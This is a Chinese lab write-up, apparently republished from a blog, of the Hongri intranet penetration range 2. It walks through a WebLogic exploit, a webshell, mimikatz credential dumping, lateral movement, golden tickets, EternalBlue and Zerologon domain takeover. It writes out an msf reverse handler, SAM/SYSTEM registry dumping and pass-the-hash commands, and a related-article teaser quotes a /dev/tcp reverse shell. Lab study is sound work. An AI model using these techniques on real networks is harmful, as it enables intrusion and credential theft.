红日内网渗透靶场2

2023-12-23 08:59
文章标签 靶场 渗透 红日

本文主要是介绍红日内网渗透靶场2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

 

环境搭建:

Web渗透:

weblogic漏洞利用

java反序列化漏洞利用、哥斯拉获取shell

上线msf

msf派生shell到cs

内网信息收集

mimikatz获取用户密码

cs横向移动

PTT攻击(票据传递)

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

cs派生shell给msf

fscan扫描内网

frp搭建socks5隧道代理

永恒之蓝的利用

kiwi获取用户hash

3389远程登录

cve-2020-1472域内提权漏洞的利用

将dc机器账户密码设置为空

wmiexec横向

恢复dc机器账户密码

远程连接域控和pc主机


 

环境搭建:

Web、PC两块网卡,都是nat模式+仅主机模式。DC为仅主机模式。三台主机的默认密码都是1qaz@WSX。

攻击机:kali(nat模式)、win10物理机。

内网网段:10.10.10.1/24

外网网段:192.168.111.1/24

kali:192.168.111.128
web:外:192.168.111.80  内:10.10.10.80
pc:外:192.168.128.201  内:10.10.10.201
dc:10.10.10.10

83ade4f9fd0f4b74b52f3093c1ad7333.png

1e118b623a3748a48b479a12d786d654.png

都进行登录,登录pc之后用管理员账号administrator/1qaz@WSX开启360杀软。

登录web服务器时注意:先登录本地用户WEB/de1ay,密码也是默认的那个密码,然后会提示密码过期 要进行修改,修改完成登录之后进行注销再登录到mssql用户(域用户),也是默认的那个密码,然后用本地管理员账号也就是刚刚修改了密码的那个,开启360杀软,然后以管理员身份运行weblogic服务。

5f819de4211b492d8fb637367ee5d9ef.png

至此,环境就搭建好了。

Web渗透:

Nmap扫描端口开放情况

1b34985335a14aeda4aad9eeebd3b93a.png

开放了多个端口,该靶机的利用点为7001端口

weblogic漏洞利用

看到7001就想到了weblogic,浏览器访问

9321ae4d5bf34eceab030d0f315dabf7.png

访问console目录跳转到weblogic控制台登录页面

ef16840abdd44241b992bcf6c03f3d3e.png

尝试了几个弱口令,没有登录成功,用weblogic专门的扫描工具进行扫描看看存在什么漏洞

f797de7109e7468c8017cfa41654d1f5.png

看到存在java反序列化漏洞,用工具进行上传payload,然后用哥斯拉连接。

java反序列化漏洞利用、哥斯拉获取shell

哥斯拉生成payload

d0e9ad09b48947179010f892b5d93726.png

复制生成的payload内容,用java反序列化漏洞利用工具进行上传

cf4a0d04d67040faa0478dac37666b1e.png

用哥斯拉进行连接

899bc5692c394b0b812ddccf9b51f91b.png

5a59e68265bb4e6baba7ddfacd8a5883.png

上线msf

生成payload反弹shell

7d4d3d3e76f241bb83e6a80e7df67bc7.png

然后通过哥斯拉上传到web服务器(被杀掉的话就考虑生成免杀payload,或者用其他方法攻击),msf开启监听之后再运行

331917ffa8ed46eb95308300d013452d.png

3f47e1ee3d814836933c8a784e7eca96.png

成功反弹shell

msf派生shell到cs

Cs开启监听

c8fba0feba1d45a28a4b668ac47a7557.png

Msf

a70696e6d9334870b98b980d89496875.png

cs上线成功

内网信息收集

shell ipconfig发现内网网段10.10.10.0/24

6f2bf8b56ea54c208122473fbb4b6390.png

Shell ipconfig /all 发现存在域de1ay.com,根据dns服务器判断域控ip为10.10.10.10

9034bce423e54fd09cfe7c72ed9e4980.png

 6d6d7f4463fb42f29c627f35e9474a5c.png

Net config workstation

d6a4c299cfc9493e85aea23ae3488acf.png

进行提权做进一步的信息收集

e283e77e62b74d7894d58c251407aabf.png

点击launch之后提权成功

查询域内用户 net user /domain

80ce8706f97c46f0a654eb25965c5152.png

查询域控 net group “domain controllers” /domain

7e8675facb7f4381b1cdea2fd2984cbc.png

查询域内其他主机名

9580bd81bd3f4f55a0b6eaf0c57e9da5.png

分别ping一下dc和pc拿到ip,域控和之前判断的一样

2a467cdc4c874187821c9e1ddaf4b4ff.png

Ping pc没通  被防火墙拦截了,但也拿到了ip

b8de0549ebf247a0a70099baef227320.png

portscan 探测存活主机+端口扫描

4f9217f77ebc4a1cba8560a758544003.png

256742a094374f5ba9c84374ad57f036.png

发现域控开了445端口。

mimikatz获取用户密码

执行mimikatz获取用户散列值和明文密码

域管理员

58e211c794f744ffa5ad859f39ea5347.png

Web主机本地管理员

283a8eec1bc94284b42574fbe94bfd9a.png

cs横向移动

因为开放了445端口, 创建一个smb监听器,

e051d9754d6741f8ae9d5839ff69c965.png

然后进行psexec横向

8aaa67e90cd143459ac5f9f1bcc88b15.png

执行后就看到成功拿下域控

0c80e3583d3848998e73569d4d687e3e.png

同理对pc进行横向

ce01ed845fff418a8033338f9c0f8aaf.png

 dc273289f2f044748164388c8a472d0a.png

成功拿下pc

a7b2b029146e4b14825f61f3f8564e5d.png

PTT攻击(票据传递)

根据前面用猕猴桃抓取到的用户NTLM HASH和SID值,对黄金票据进行利用

78786720bf354c79aa80ca8db74e0c2a.png

选中administrator权限的web主机 右键 access->golden ticket

14728b27dab741ddb6656776e52a4d46.png

55f08342e540425e8c44ccd59aeda021.png

成功之后进行验证

6635c4ba731e46a5aa3ef1017755676d.png

伪造用户名成功

 

刚刚主要是利用cs进行内网的渗透,接着通过msf进行一个内网的渗透,记录一下。

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

我们可以通过cs来生成一个web delivery,即通过powershell绕过360杀软上线cs

7aaa63ea2e0249f387dbf79c0eb8682b.png

 c42d471f823240aabdbd476d23956eaf.png

然后通过哥斯拉执行powershell上线

6bfd148ab96c4b2c8c0fa8c016cc00e1.png

11d7138b00b74ab3881454dd1b057380.png

成功上线cs

cs派生shell给msf

打开msf,启动handler监听

msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_httpset lhost xxxxxx  set lport xxxxrun

 

dbe4d8b76af747f6b8ff6a86ad742210.png

cs新建一个外部监听

5d0a76083e084737b9423972c283c58a.png

然后在cs的控制台输入spawn cs-msf

f8861df8a47d47d5bc5d95733e3fdb47.png

msf中成功接收

6129dd733a534319b736283ad1df5149.png

尝试getsystem提权,行不通。

fscan扫描内网

上传fscan到web主机上然后进行扫描

12b7dbf81143413aa162083838418785.png

然后利用fscan扫描内网网段

a078bb3b79ce4f64a3f35980d2a416ed.png

c3da4d8c8c994f76813e60e9ae748d6a.png

发现10和80都存活且都存在永恒之蓝

由于都开了防火墙,所以说远程是打不进去的,尝试用本地流量来打。

frp搭建socks5隧道代理

通过frp建立一个SOCKS隧道

9244668c74c648a4ae981a02664ea6ee.png

上传完之后编辑frpc.ini,改为本地的ip

612c80125fe4494eb9a5069a1ccba485.png

然后现在kali本地启动服务端

dde2106cf6f14d488bb5bc2ca0eca361.png

再运行刚刚上传的客户端

42acdc71a7d94e879dd326fbd1ebd719.png

527dea95dc0c4235ab00b7a708d24450.png

永恒之蓝的利用

然后通过执行命令

setg Proxies socks5:127.0.0.1:8989Setg ReverseAllowProxy true

 

设置一个全局代理

dbef0cf67d324b838f453dcb946954d5.png

 2f438fd984534c26ab7a168b76a7ad15.png

攻击成功。

kiwi获取用户hash

接着通过kiwi抓取用户密码

Load kiwi

Creds_all

3183bab844454845b13c9ac2d87e0f43.png

12626265765342ca8ac9ce2d08bd1bee.png

拿到了web主机本地用户的用户名和密码以及域用户的用户名和密码。

3389远程登录

最开始的扫描过程中得知了是开了3389端口的,可以进行远程登录一波

修改proxychains的配置文件vi /etc/proxychains.conf

1fd83cc48de44be293f22e9719eef28d.png

然后通过代理进行远程登录

a060c6ce6f2d43c0b0dff2dd3e78ac24.png

2712aca630dc40908d040b92ffcdcc6e.png

由于使用的是本地管理员账户进行登录,所以可以退了杀软,关闭防火墙

3faf7082634c4af298ec9352f74bc65f.png

cve-2020-1472域内提权漏洞的利用

接着对cve-2020-1472域内提权漏洞进行利用(下文相关的exp和poc都可以在github上找到)

由于不知道是否存在该域内提取漏洞,所以先使用github上的poc对dc进行检测是否存在该漏洞

开着代理来执行poc

691807a6e72f433bbece83f5d9a7835e.png

a50c29552ef144129851a4cc26d0534e.png

说明dc存在该漏洞。

将dc机器账户密码设置为空

然后用该漏洞的exp进行攻击,该攻击使得dc机器账户的密码设置为空

91bfa89dc4554eaf934b8b21f91d528f.png

b09ccd91c0c44748b4556c41872df778.png

重置成功

47e22eed20134d45891052c1474a2f1f.png

接着通过impacket包(先apt install python3-impacket)来dump用户hash,linux下$代表变量 所以要加\进行转义

7c381f4d3eab4f00a7c677d7afbba92a.png

拿到域管理员的hash。因为知道了这个的密码强度过高,直接进行解密的话是无法成功的

wmiexec横向

可以通过impacket包的wmiexec进行一个横向

Proxychains impacket-wmiexec -hashes NTLM-HASH ./administrator@10.10.10.10

3a9ea9250c084fc9b37807cd95f279bc.png

成功拿到dc的shell,接下来就是要拷贝dc中SAM数据库到本地,然后提取里面的数据来恢复刚刚我们清空的dc机器账户的密码(这是因为如果机器账户hash长时间为空,可能会导致脱域,对内网的使用产生重大影响,因此拿到权限的第一时间需要把hash重置回去。)

先执行如下三条命令将数据库的三个文件保存到dc本地,然后用get命令进行下载 最后可以在dc中将其删掉

reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.savedel /f system.savedel /f sam.savedel /f security.save

 

bea88d5b9bc54d6eb4a0ad9c2ad2ab6f.png

 e184baedab4d496aae833c859e477e07.png

然后可以在靶机中将其删掉

b9be4f5784834d2ba7f2f3326b297b7f.png

恢复密码之前顺便修改一下域管的密码

4dba63bda2e7415680019b787d945370.png

恢复dc机器账户密码

利用impacket-secretsdump提取那三个文件里的数据

2d76257ba3134eee98cbb569e122f7c7.png

然后利用脚本进行恢复

27100291d6684f4dbf38e6c4ea171524.png

 deef4d3e1b5e4ee999f882b163bf0253.png

这时候再用刚刚的impacket-secretsdump -no-pass来dump 用户hash,

bcc6710ac6b34fc8a187c8a3d9ab0d1e.png

发现无法获取了,说明恢复成功

远程连接域控和pc主机

接着在刚刚开启的远程桌面进行远程连接域控 administrator/Admin12345

eb27cdba405a4fdb926f9fcf632aef2e.png

 a1048f402d5642e19ab7ebfc92405060.png

成功连接域控,关闭其防火墙

51e7a8ba6c0f4800ba232adc3fa82eec.png

然后在服务管理器发现域内另外一台机器pc

7a6b3c23c55948f4a6a5c263ac6ffe65.png

再ping一下它就拿到它的ip,再次进行远程登录,开始登录失败了,要以de1ay域的管理员登录才能成功,如下图

f1d668ce25c74d56884fc5b9d7a70a56.png

5fc5e67089084e288f5f7a4c5912c64b.png

同样,把杀软退了和关闭防火墙,防火墙都关了之后就可以正常进行上线了,后续就不展示了(开始用cs上线过)

 

 

最后附一个链接了解cve-2020-1472域内提取漏洞:

https://www.jianshu.com/p/525be0335404

 

 

这篇关于红日内网渗透靶场2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/527463

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

渗透中的文件上传与下载

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。 目录 利用powershell进行文件上传下载 利用bitsadmin命令进行文件下载 利用certutil命令上传下载文件 利用wget命令上传下载文件 利用powershell进行文件上传下载 # 下载脚本并在内存中执行pow

【网络安全 | 渗透工具】Cencys+Shodan使用教程

原创文章,不得转载。 文章目录 Cencys准备语法全文搜索字段和值搜索通配符搜索布尔逻辑搜索嵌套搜索时间相关搜索范围搜索双引号 (")转义序列和保留字符 Censys 搜索语言中的主机查询查看主机搜索结果Censys 搜索语言中的证书查询查看证书搜索结果生成报告其余 Shodan准备使用语法查看设备详情 Cencys Censys 是一个强大的互联网搜索引擎和数据平台